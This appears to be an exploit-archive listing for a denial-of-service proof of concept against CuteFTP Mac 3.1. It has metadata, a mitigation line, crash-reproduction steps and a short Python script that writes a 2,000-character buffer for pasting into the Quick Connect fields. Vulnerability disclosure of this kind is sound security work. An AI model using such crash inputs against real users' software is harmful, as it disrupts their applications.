header-logo
Suggest Exploit
vendor:
CuteFTP Mac
by:
Yair Rodríguez Aparicio
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: CuteFTP Mac
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:globalscape:cuteftp_mac
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: macOS High Sierra 10.13
2018

CuteFTP Mac 3.1 Denial of Service (PoC)

This exploit is a proof of concept for a denial of service vulnerability in CuteFTP Mac 3.1. The vulnerability is triggered when a user pastes a large amount of data into the 'Host', 'User', 'Password' and 'Port' fields of the 'Quick Connect' window. This causes the application to crash.

Mitigation:

Users should avoid pasting large amounts of data into the 'Quick Connect' window of CuteFTP Mac 3.1.
Source

Exploit-DB raw data:

# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC)
# Date: 2018-11-06
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: http://go.globalscape.com/download/cuteftp-macosx
# Version: 3.1
# Tested on: macOS High Sierra 10.13

# Steps to Produce the Crash:
# 1.- Run python code : python cute.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open CuteFTP Mac
# 4.- Clic on "Quick Connect"
# 4.- Paste clipboard on "Host", "User", "Password" and "Port"
# 5.- click on "Run"
# 6.- Crashed!



buffer = "\x41" * 2000
f = open("text.txt", "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR